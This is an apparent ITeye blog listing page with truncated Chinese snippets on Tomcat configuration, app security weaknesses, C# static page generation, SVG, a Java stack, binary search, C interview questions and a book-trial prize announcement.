tomcat虚拟目录安装及其配置 eksliang tomcat配置说明 tomca部署web应用 tomcat虚拟目录安装
转载请出自出处：http://eksliang.iteye.com/blog/2097184 1.-------------------------------------------tomcat 目录结构 config：存放tomcat的配置文件 temp ：存放tomcat跑起来后存放临时文件用的 work ：当第一次访问应用中的jsp
浅谈：APP有哪些常被黑客利用的安全漏洞 gg163 APP
首先，说到APP的安全漏洞，身为程序猿的大家应该不陌生；如果抛开安卓自身开源的问题的话，其主要产生的原因就是开发过程中疏忽或者代码不严谨引起的。但这些责任也不能怪在程序猿头上，有时会因为BOSS时间催得紧等很多可观原因。由国内移动应用安全检测团队爱内测（ineice.com）的CTO给我们浅谈关于Android 系统的开源设计以及生态环境。 1. 应用反编译漏洞：APK 包非常容易被反编译成可读
C#根据网址生成静态页面 hvt Web .net C#asp.net hovertree
HoverTree开源项目中HoverTreeWeb.HVTPanel的Index.aspx文件是后台管理的首页。包含生成留言板首页，以及显示用户名，退出等功能。根据网址生成页面的方法： bool CreateHtmlFile(string url, string path) { //http://keleyi.com/a/bjae/3d10wfax.htm stri
SVG 教程（一）天梯梦 svg
SVG 简介 SVG 是使用 XML 来描述二维图形和绘图程序的语言。学习之前应具备的基础知识：继续学习之前，你应该对以下内容有基本的了解： HTML XML 基础如果希望首先学习这些内容，请在本站的首页选择相应的教程。什么是SVG？ SVG 指可伸缩矢量图形 (Scalable Vector Graphics) SVG 用来定义用于网络的基于矢量
一个简单的java栈 luyulong java 数据结构栈
public class MyStack { private long[] arr; private int top; public MyStack() { arr = new long[10]; top = -1; } public MyStack(int maxsize) { arr = new long[maxsize]; top
基础数据结构和算法八：Binary search sunwinner Algorithm Binary search
Binary search needs an ordered array so that it can use array indexing to dramatically reduce the number of compares required for each search, using the classic and venerable binary search algori
12个C语言面试题，涉及指针、进程、运算、结构体、函数、内存，看看你能做出几个！刘星宇 c 面试
12个C语言面试题，涉及指针、进程、运算、结构体、函数、内存，看看你能做出几个！ 1.gets()函数问：请找出下面代码里的问题： #include<stdio.h> int main(void) { char buff[10]; memset(buff,0,sizeof(buff));
ITeye 7月技术图书有奖试读获奖名单公布 ITeye管理员活动 ITeye 试读
ITeye携手人民邮电出版社图灵教育共同举办的7月技术图书有奖试读活动已圆满结束，非常感谢广大用户对本次活动的关注与参与。 7月试读活动回顾： http://webmaster.iteye.com/blog/2092746 本次技术图书试读活动的优秀奖获奖名单及相应作品如下（优秀文章有很多，但名额有限，没获奖并不代表不优秀）：《Java性能优化权威指南》

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他